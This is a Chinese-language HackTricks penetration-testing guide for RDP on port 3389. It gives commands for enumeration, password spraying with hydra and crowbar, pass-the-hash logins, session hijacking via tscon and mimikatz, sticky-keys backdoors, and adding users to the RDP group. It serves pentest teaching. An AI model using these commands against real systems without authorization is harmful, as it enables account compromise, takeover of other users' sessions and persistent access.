# 3389 - RDP渗透测试
从零开始学习AWS黑客攻击直到成为专家,通过 htARTE (HackTricks AWS Red Team Expert)! 支持HackTricks的其他方式: * 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
**即刻可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,拥有20多个从侦察到报告的工具和功能。我们不替代渗透测试人员 - 我们开发定制工具、检测和利用模块,以便他们有更多时间深入挖掘、弹出shell,并享受乐趣。 {% embed url="https://pentest-tools.com/" %} ## 基本信息 **远程桌面**协议(**RDP**)是微软开发的专有协议,它为用户提供了一个图形界面,以便通过网络连接连接到另一台计算机。用户为此目的使用**RDP**客户端软件,而另一台计算机必须运行**RDP**服务器软件(来自[这里](https://en.wikipedia.org/wiki/Remote\_Desktop\_Protocol))。 **默认端口:** 3389 ``` PORT STATE SERVICE 3389/tcp open ms-wbt-server ``` ## 枚举 ### 自动 {% code overflow="wrap" %} ```bash nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 ``` {% endcode %} 它检查可用的加密和DoS漏洞(不会对服务造成DoS)并获取NTLM Windows信息(版本)。 ### [暴力破解](../generic-methodologies-and-resources/brute-force.md#rdp) **注意,你可能会锁定账户** ### **密码喷射** **注意,你可能会锁定账户** ```bash # https://github.com/galkan/crowbar crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' # hydra hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp ``` ### 使用已知的凭据/哈希连接 ```bash rdesktop -u rdesktop -d -u -p xfreerdp [/d:domain] /u: /p: /v: xfreerdp [/d:domain] /u: /pth: /v: #Pass the hash ``` ### 检查已知凭据是否适用于RDP服务 impacket中的rdp\_check.py允许您检查某些凭据是否对RDP服务有效: ```bash rdp_check /:@ ```
**即时可用的漏洞评估与渗透测试设置**。在任何地方运行完整的渗透测试,拥有20多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发定制工具、检测和利用模块,以便让他们有更多时间深入挖掘、弹出shell,并享受乐趣。 {% embed url="https://pentest-tools.com/" %} ## **攻击** ### 会话窃取 拥有**SYSTEM权限**,你可以访问任何用户**打开的RDP会话**,无需知道所有者的密码。 **获取打开的会话:** ``` query user ``` **访问选定的会话** ```bash tscon /dest: ``` 现在您将进入所选的RDP会话,并且您将仅使用Windows工具和功能模拟用户。 **重要**:当您访问活动的RDP会话时,您将踢掉正在使用它的用户。 您可以通过转储进程来获取密码,但这种方法更快,并且可以让您与用户的虚拟桌面互动(密码在记事本中未保存在磁盘上,其他机器上打开的其他RDP会话...) #### **Mimikatz** 您也可以使用mimikatz来做到这一点: ```bash ts::sessions #Get sessions ts::remote /id:2 #Connect to the session ``` ### Sticky-keys & Utilman 将此技术与**stickykeys**或**utilman**结合使用,您将能够随时访问管理CMD和任何RDP会话。 您可以使用以下链接搜索已经用这些技术后门的RDP:[https://github.com/linuz/Sticky-Keys-Slayer](https://github.com/linuz/Sticky-Keys-Slayer) ### RDP 进程注入 如果其他域的某人或拥有**更高权限的用户通过RDP登录**到您是管理员的PC,您可以在他的**RDP会话进程**中**注入**您的信标,并以他的身份行动: {% content-ref url="../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md" %} [rdp-sessions-abuse.md](../windows-hardening/active-directory-methodology/rdp-sessions-abuse.md) {% endcontent-ref %} ### 将用户添加到RDP组 ```bash net localgroup "Remote Desktop Users" UserLoginName /add ``` ## 自动化工具 * [**AutoRDPwn**](https://github.com/JoelGMSec/AutoRDPwn) **AutoRDPwn** 是一个使用Powershell创建的后渗透框架,主要设计用于自动化对Microsoft Windows计算机的**Shadow**攻击。这个漏洞(被Microsoft列为一个特性)允许远程攻击者**在未经受害者同意的情况下查看其桌面**,甚至在需要时使用操作系统本身的工具控制它。 * [**EvilRDP**](https://github.com/skelsec/evilrdp) * 从命令行自动控制鼠标和键盘 * 从命令行自动控制剪贴板 * 从客户端生成一个SOCKS代理,通过RDP将网络通信引导至目标 * 在目标上执行任意SHELL和PowerShell命令,无需上传文件 * 即使在目标上禁用了文件传输,也能上传和下载文件到/从目标 ## HackTricks 自动化命令 ``` Protocol_Name: RDP #Protocol Abbreviation if there is one. Port_Number: 3389 #Comma separated if there is more than one. Protocol_Description: Remote Desktop Protocol #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for RDP Note: | Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft, which provides a user with a graphical interface to connect to another computer over a network connection. The user employs RDP client software for this purpose, while the other computer must run RDP server software https://book.hacktricks.xyz/pentesting/pentesting-rdp Entry_2: Name: Nmap Description: Nmap with RDP Scripts Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP} ```
**即刻可用的漏洞评估与渗透测试设置**。在任何地方运行完整的渗透测试,拥有20多个从侦察到报告的工具和功能。我们不替代渗透测试人员 - 我们开发定制工具、检测和利用模块,以便让他们有更多时间深入挖掘、弹出shell,并享受乐趣。 {% embed url="https://pentest-tools.com/" %}
从零开始学习AWS黑客技术,成为英雄,通过 htARTE (HackTricks AWS Red Team Expert) 其他支持HackTricks的方式: * 如果您希望在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方的PEASS & HackTricks商品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。** * **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。